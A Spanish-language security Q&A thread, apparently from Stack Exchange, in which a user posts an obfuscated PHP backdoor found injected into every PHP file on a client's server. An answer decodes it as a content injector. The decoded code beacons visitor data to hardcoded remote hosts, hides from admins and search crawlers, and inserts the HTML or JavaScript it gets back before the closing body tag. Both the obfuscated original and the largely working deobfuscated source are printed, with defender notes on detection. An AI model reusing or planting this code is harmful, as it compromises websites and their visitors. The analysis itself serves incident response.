¿Es esto una puerta trasera?


Encontré el siguiente código en el sitio de mis clientes. Parece un backdoor típico oculto con hexadecimal, pero no estoy 100% seguro.

<?php if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]); if ((! strstr($ua,"\x6d3\x695")) and (! strstr($ua,"\x726\x3a\x31"))) $GLOBALS["\x616\x756\x61"]=1; } ?><?php $zdsnpbzghe = 'x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>5c%x7860QUUI&e_SEEB%x5-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%xX;%x5c%x7860msvd}R;*msv%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x55c%x7825tww**WYsboepn)%x5c%x78258:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]2715hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x786]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5464]284]364]6]234]342]58]24]31#-%x5782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%fmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c#)fepmqyf%x5c%x7827*&7-n%x5c%x7860hfsq)!sp!*#ojneb#-278]225]241]334]368]322]3]364]6]2{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%160%x28%42%x66%152%x66%147%x67%42%x2c%163%y35]256]y76]72]y3d]51]y35]274]y4:]82ovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7c%x7825iN}#-!tussfw)%x!isset($GLOBALS["%x61%156%x75%156%x61"])))) 
%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvsox7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bub6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256%x7825:|:*r%x5c%x7825:-t%x5c%x782%x782f#%x5c%x7825#%x5c%xx7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;7824-%x5c%x7824]y8%x5cx7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%jyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojRx5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus85csboe))1%x5c%x782f3g%x5c%x7825)!gj!~<ofmyx5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%xx7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%787f_*#fubfsdXk5%x5c%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c3:]68]y76#<%x5c%x78e%x5c%x78b,;uqpuft%x5c%x7860msvd}+;!>!}%x5c%%x5c%x7860TW~%x5c%x7824<%xx7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7317]445]212]445]43]321]87f<*X&Z&S{ftmfV%x5c%x78%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudc%x7825:<**#57]38y]47]67y]37]88y]27]28yx7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x59]274]y85]273]y6g]273]y76]%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#uj4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]Dx7825zB%x5c%x7825z>!HB%x5c%x7860SFTV%x5c%x7860QUUIy76]61]y33]68]y34]68]ypd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGT%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7gA%x5c%x7827doj%x5c%x78256<%xc%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***fufs:~:<*9-1-r%x5c%x7825)s%x5c!>!#]y84]275]
y83]273]y76]277fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}c%x7825!<*#}_;#)323ldfid>}&;!osvufs}825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%xgj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjc%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-278256<.msv%x5c%x7860dz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]285]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); };)gj}l;33bq}k;opjudovg}%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%16x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{56<pd%x5c%x7825w6Z6<.4*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%25mm)%x5c%x7825%x5c%ubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<%x7824-%x5c%x7824]26%x5c%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825x5c%x7825Z<^2%x5c%x785c7%x65","%x65%166%x61%154%]#%x5c%x782fr%x5c%x7825%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x786027,*b%x5c%x7827)fepd787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5cftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]%x5c%x7825,3,j%x5c%x7825>j%x7824]25%x5c%x7824-%x5#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#mhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825{ $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return 
chr(ox5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x:h%x5c%x7825:<#64y]5>}R;msv}.;%x5c%x782f#%x5c%x7W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%7!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)t&b%x5c%x7825!|!*)323zbek!~!#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuop%x7825>%x5c%x782fh%x581]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%xx28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x75c%x78e%x5c%x78b%x5c%x78!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18Rc%x7825!<*::::::-111112)eobs%x5c%x7860un%x7824-%x5c%x7824<%x5c78]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f5]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78255.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y8)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x78c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFb:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!%x782f20QUUI7jsv%x5c%x78257UFH#%x5%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hAx5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=trd($n)-1);} @error_reporting(0); 
preg_replace("%x2f%50%x2e%52%x29%585cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]DwN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x782]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%5c%x7878;0]=])0#)U!%x5c%x7827z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c7;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5D#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgPdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78c%x782f+*0f(-!#]y76]277]y72]265j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%825i%x5c%x785c2^<!Ce*[!%x5cpqsut>j%x5c%x7825!*9!%x5c%x7827!hmqj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj83]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]ojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw5%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y4]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw5]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%xbss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%E{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]28c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x7>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnx5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd}x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y35c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x782x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7822b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x75c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x7824
2178}527}85c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7826<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfs2fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%>1*!%x5c%x7825b:>1<!fmtf!%x5c%x78255c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825wc%x7824-!%x5c%x7825%25hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%xj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>%x782f7&6|7**111127-K)qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%%x5c%x7824-%x5c%x7824*<!%x5c%x7824c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osv>qp%x5c%x7825!|Z~!<##!>!2p%x%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wbd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x56*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7882f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y8%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825t%x5c%x7827pd%x5c%x782%x5c%x787f;!opjudovg}k~~9{d%-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+f52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462<b%x5c%x7825%x5c%x787f!<X>b!|ftmf!~<**9.-j%x5c%x7825/(.*)/epreg_replacepcxbdxfawf'; $ibnuwgraod = 
explode(chr((272-228)),'3721,60,1040,44,4913,69,6639,67,4175,25,5385,67,880,43,3781,56,7594,63,2006,29,6509,67,9756,21,3876,22,3532,51,1285,39,7868,58,1712,52,728,25,4442,69,9108,22,2767,44,228,65,6997,43,6357,34,3325,57,7457,39,8745,65,7272,52,4115,37,6100,56,3099,58,9571,37,3965,46,5581,53,6706,36,6742,41,3382,20,4551,40,1898,21,3499,33,3278,47,2964,29,8908,59,5905,39,2357,64,2864,35,1560,42,2525,52,7557,37,9442,64,4231,63,3157,41,144,24,8232,66,2035,34,1381,47,2421,40,3459,40,2811,53,10081,25,9805,67,3234,44,8344,64,5127,59,7423,34,1690,22,4651,27,2461,64,686,42,1241,44,7926,62,8163,69,2701,66,1205,36,4152,23,8472,39,6391,63,8572,47,9385,57,2993,49,6156,47,4294,20,293,52,5774,40,9321,28,8682,63,9935,55,4819,47,753,27,3898,47,1150,55,5322,63,68,22,6203,43,2649,30,5186,27,10054,27,4077,38,9872,63,540,58,1764,70,8115,48,5040,28,9506,65,3198,36,9777,28,168,60,1500,60,6454,55,2180,69,959,59,7763,53,4314,60,2156,24,4011,42,4700,58,5717,57,5213,38,7155,53,4374,68,3837,39,3696,25,6922,29,813,67,1357,24,633,53,8298,46,2331,26,9651,66,7657,56,3071,28,6048,52,496,44,9279,42,3042,29,5251,21,2249,39,4200,31,8810,63,0,68,5020,20,9990,64,5452,59,1324,33,8619,63,377,70,6876,46,4678,22,8967,20,8408,64,7354,42,1602,67,9130,66,4982,38,1428,22,4053,24,5814,22,2899,65,9196,34,90,54,4511,40,6292,65,8066,49,923,36,7095,60,1018,22,8511,61,7396,27,1084,66,5658,59,2629,20,4866,47,6832,44,447,49,8987,69,345,32,7816,52,5272,50,3583,53,5836,38,5511,70,7208,64,6783,49,2577,52,7988,39,5874,31,1969,37,9717,39,3402,57,4591,60,780,33,7496,61,2133,23,598,35,8027,39,1669,21,5991,57,1450,50,6576,63,9056,52,8873,35,6246,46,1834,64,2288,43,9230,49,5944,47,6951,46,9349,36,2069,26,5634,24,3945,20,2095,38,4758,61,5068,59,1919,50,7040,55,7324,30,7713,50,2679,22,9608,43,3636,60'); $hlrywdpqbc=substr($zdsnpbzghe,(44960-34854),(41-34)); if (!function_exists('kscpwxzuhr')) { function kscpwxzuhr($xjucvuiret, $bsoixxpekh) { $uzadkdkdcj = NULL; 
for($ylffdjxxwv=0;$ylffdjxxwv<(sizeof($xjucvuiret)/2);$ylffdjxxwv++) { $uzadkdkdcj .= substr($bsoixxpekh, $xjucvuiret[($ylffdjxxwv*2)],$xjucvuiret[($ylffdjxxwv*2)+1]); } return $uzadkdkdcj; };} $jztylhmlin="\x20\x2a\x740\x6f7\x632\x774\x782\x20\x2f\x656\x614\x283\x742\x5f2\x650\x6c1\x635\x283\x682\x28\x32\x36\x31\x39\x29\x203\x682\x28\x32\x35\x32\x33\x29\x203\x733\x707\x782\x750\x72\x241\x626\x757\x672\x617\x64\x242\x643\x6e0\x622\x670\x65\x29\x3b\x2f\x206\x6f3\x7a2\x6d5\x765\x6e\x2a\x20"; $nbbppijzpp=substr($zdsnpbzghe,(68445-58332),(68-56)); $nbbppijzpp($hlrywdpqbc, $jztylhmlin, NULL); $nbbppijzpp=$jztylhmlin; $nbbppijzpp=(752-631); $zdsnpbzghe=$nbbppijzpp-1; ?>

Si en realidad es una puerta trasera, tengo curiosidad por saber qué hace, por si alguien tiene la paciencia de interpretarlo.

Gracias de antemano.

EDIT:

Mi cliente no está involucrado en el desarrollo web, y cuando le pregunté sobre este código no lo había visto antes.

Me di cuenta ahora que el código se coloca en la parte superior de casi todos los archivos en una instalación de WordPress, ya que se habría colocado allí automáticamente.

EDIT 2:

De hecho, el código malicioso se colocó en cada archivo PHP en el servidor, no solo dentro de WordPress.

    
pregunta Ivar 13.10.2014 - 16:58

1 respuesta


No. La puerta trasera no está en este script. Esta pieza de código altamente ofuscado contiene un programa que permite al atacante agregar dinámicamente cualquier HTML o JavaScript, llamando al azar a un servidor ubicado en 31.184.192.250 con uno de los cuatro nombres de host "33db9538.com", "9507c4e8.com", "e5b57288.com", "54dfa1cb.com".

El código desofuscado se parece a esto:

// generate hostname
/**
 * Returns one of four hard-coded C2 host labels with $qw appended (the TLD,
 * ".com" when called from cqq()).
 *
 * The $arr parameter is overwritten on the first line, so whatever the caller
 * passes is ignored. rand() is handed 1.125 as its upper bound; PHP coerces
 * that to int 1, so as written only the first two labels can ever be chosen —
 * presumably a deobfuscation artifact rather than the author's intent.
 * Defender note: the four labels plus suffix are the network IoCs for this
 * infection; match outbound DNS/HTTP against them.
 */
function random($arr, $qw) {
    $arr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    return $arr[rand(0, 1.125)].$qw;
}

// return hostname of malware-hosting server
/**
 * Thin wrapper around random(): builds the C2 hostname for TLD $qw.
 *
 * $domarr is not defined in this scope (the only $domarr in the listing is a
 * local inside day212()), so null is passed; random() discards its first
 * argument anyway, so this has no effect.
 */
function cqq($qw)
{
    return random($domarr, $qw);
}

// custom encoding
/**
 * XOR-based stream cipher used for both encoding request parameters and
 * decoding the C2 response; since it is a plain XOR, the same call decrypts.
 *
 * Keystream: starting from an empty $g, repeatedly take md5($g . $q . "q1w2e3r4")
 * as raw bytes and append its first 8 bytes to $g until $g is at least as long
 * as $s. Note that $q is overwritten with the binary digest on the first pass,
 * so every later round hashes (keystream so far . previous digest . salt).
 * PHP's string XOR uses the length of the shorter operand, so excess keystream
 * bytes are simply dropped; an empty $s yields "".
 *
 * @param string $s plaintext or ciphertext
 * @param string $q per-request key ($op, a 6-digit number from mt_rand in day212())
 * @return string $s XOR keystream
 */
function en2($s, $q)
{
    $g = "";
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g.$q."q1w2e3r4")); # convert to binary string
        $g.= substr($q, 0, 8);
    }
    return $s^$g; # XOR, bits set in either $s or $g but not both
}

// g_* functions are four different ways to retrieve content from remote URL
/**
 * Fetch $url with file_get_contents() (requires allow_url_fopen).
 *
 * The @ suppresses any warning so the fetch leaves no trace in the error log;
 * a disabled function or an empty body is reported as false so gtd() moves on
 * to the next transport.
 *
 * @return string|false response body, or false on failure / empty response
 */
function g_1($url)
{
    if(function_exists("file_get_contents") === false) return false;
    $buf = @file_get_contents($url);
    if($buf == "") return false;
    return $buf;
}

/**
 * Fetch $url with the curl extension.
 *
 * Body only (CURLOPT_HEADER = 0), returned as a string rather than echoed
 * (CURLOPT_RETURNTRANSFER = 1), with a 10-second cap so a slow or sinkholed C2
 * does not stall the page render. Empty body or curl failure maps to false,
 * matching g_1()'s contract.
 *
 * @return string|false response body, or false on failure / empty response
 */
function g_2($url)
{
    if(function_exists("curl_init") === false) return false;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $res = curl_exec($ch);
    curl_close($ch);
    if($res == "") return false;
    return $res;
}
....

// try progressively more complicated method if the previous one did not work
/**
 * Download $url, trying g_1() through g_4() in turn and returning the first
 * non-false result; "" if every transport fails.
 *
 * g_3() and g_4() are elided from this listing ("...." above), so their
 * mechanisms are not visible here. The initial $co = "" is dead: it is
 * overwritten by the g_1() call on the next line. Every call is @-suppressed,
 * so a blocked egress path produces no PHP warning — outbound traffic logs
 * (egress firewall, proxy, DNS) are the reliable place to detect the beacon.
 *
 * @return string response body or ""
 */
function gtd($url)
{
    $co = "";
    $co = @g_1($url);
    if($co !== false) return $co;
    $co = @g_2($url);
    if($co !== false) return $co;
    $co = @g_3($url);
    if($co !== false) return $co;
    $co = @g_4($url);
    if($co !== false) return $co;
    return "";
}

// encode server parameters
/**
 * Encrypts $text with en2() under key $op and base64-encodes the result, so a
 * request field can be carried in the beacon URL. Because en2() is symmetric,
 * anyone holding $op (which day212() sends in clear as the URL path) can
 * recover the original values from captured traffic.
 *
 * @param int|string $op per-request key
 * @param string $text value to hide
 * @return string base64 ciphertext
 */
function k34($op, $text)
{
    return base64_encode(en2($text, $op));
}

// check if server parameters exist
/**
 * Reads $_SERVER[$param], substituting the sentinel string "non" when the key
 * is absent or empty. day212() later compares against "non" to decide whether
 * the request has enough context to beacon.
 *
 * @param string $param $_SERVER key
 * @return string the value, or "non"
 */
function check212($param)
{
    if(!isset($_SERVER[$param])) $a = "non";
    else if($_SERVER[$param] == "") $a = "non";
    else $a = $_SERVER[$param];
    return $a;
}

// extract payload
/**
 * Beacons to the C2 and returns the HTML/JS fragment that pa22() injects into
 * the page, or "" when the request should be left untouched.
 *
 * Evasion: returns "" without contacting the C2 when the user agent, remote
 * address or host header is missing, when PHP_SELF contains "admin" (the
 * site operator's backend), or when the user agent matches the crawler list
 * (google, slurp, msnbot, ia_archiver, yandex, rambler). That is why the
 * admin and search engines see a clean page. Note strrpos() is used as a
 * boolean, so "admin" at offset 0 would not count; PHP_SELF starts with "/"
 * in practice, so this is mostly harmless to the author.
 *
 * Beacon: $op is a fresh 6-digit key per request. The five request fields are
 * each encrypted with k34() under $op, joined with ".", urlencoded twice and
 * appended as the query string; $op itself is the URL path, in clear. The
 * resulting GET goes to http://<random label>.com/<op>?<blob>. The response is
 * decrypted with en2() under the same $op and split on "!NF0"; the second
 * part is the injected payload.
 *
 * Detection: outbound HTTP GET to one of the four listed hosts whose path is
 * a 6-digit number followed by a long, doubly-urlencoded base64 query.
 *
 * The local $domarr is written but never read here (cqq() references an
 * undefined variable of the same name instead).
 *
 * @return string HTML/JS to inject, or ""
 */
function day212()
{
    $a = check212("HTTP_USER_AGENT");
    $b = check212("HTTP_REFERER");
    $c = check212("REMOTE_ADDR");
    $d = check212("HTTP_HOST");
    $e = check212("PHP_SELF");
    $domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    if(($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin")
     or (preg_match("/google|slurp|msnbot|ia_archiver|yandex|rambler/i", strtolower($a))))
    {
        $o1 = "";
    }
    else {
        $op = mt_rand(100000, 999999);
        $g4 = $op."?".urlencode(urlencode(k34($op, $a).".".k34($op, $b).".".k34($op, $c)
         .".".k34($op, $d).".".k34($op, $e)));
        $url = "http://".cqq(".com")."/".$g4;
        $ca1 = en2(@gtd($url) , $op);
        $a1 = @explode("!NF0", $ca1);
        if(sizeof($a1) >= 2) $o1 = $a1[1];
        else $o1 = "";
    }
    return $o1;
}

// uncompress html to buffer
/**
 * Best-effort decompression of the output buffer so the injector can search
 * the HTML even when the site compresses its output. Tries gzinflate,
 * comgzi, gzuncompress and (if available) gzdecode in that order and returns
 * the first success; if none applies, the buffer is returned as-is.
 *
 * comgzi() is not a PHP builtin and is not defined in this listing — likely an
 * elided helper or a deobfuscation artifact. @ does not suppress a fatal
 * "undefined function" error, so if it truly does not exist this line would
 * abort the request whenever gzinflate() fails. $length is never used.
 *
 * @param string $cz possibly-compressed buffer
 * @return string decompressed buffer, or $cz unchanged
 */
function dcoo($cz, $length = null)
{
    if(false !== ($dz = @gzinflate($cz))) return $dz;
    if(false !== ($dz = @comgzi($cz))) return $dz;
    if(false !== ($dz = @gzuncompress($cz))) return $dz;
    if(function_exists("gzdecode")) {
        $dz = @gzdecode($cz);
        if(false !== $dz) return $dz;
    }
    return $cz;
}

// callback function to accept buffer and append code at bottom of html
/**
 * Output-buffer callback registered by ob_start("pa22") below.
 *
 * Forces "Content-Encoding: none" because the buffer is decompressed by
 * dcoo() before being returned, so any compression header the page set would
 * no longer match the body. The payload from day212() is inserted, with a
 * newline, immediately before the first closing </body> tag (limit 1), or
 * before </html> if there is no </body>; pages with neither are returned
 * unchanged. day212() is only evaluated on the matching branch, so
 * non-HTML responses never trigger a beacon.
 *
 * Detection: the injected fragment sits on the line right before </body>
 * (or </html>) in served pages; compare the served HTML with the source on
 * disk. Header() works because PHP function names are case-insensitive.
 *
 * @param string $v raw output buffer
 * @return string buffer to send to the client
 */
function pa22($v)
{
    Header("Content-Encoding: none");
    $t = dcoo($v);
    if(preg_match("/\<\/body/si", $t)) {
        return preg_replace("/(\<\/body[^\>]*\>)/si", day212()."\n$1", $t, 1);
    }
    else {
        if(preg_match("/\<\/html/si", $t)) {
            return preg_replace("/(\<\/html[^\>]*\>)/si", day212()."\n$1", $t, 1);
        }
        else {
            return $t;
        }
    }
}

// start processing
// Registers pa22() as the output-buffer callback for the whole request: every
// byte the original file echoes passes through pa22() before reaching the
// client. This single statement is what turns the functions above into an
// active injector; it runs before the legitimate file content that follows.
ob_start("pa22");

/**** original code starts here ****/
....

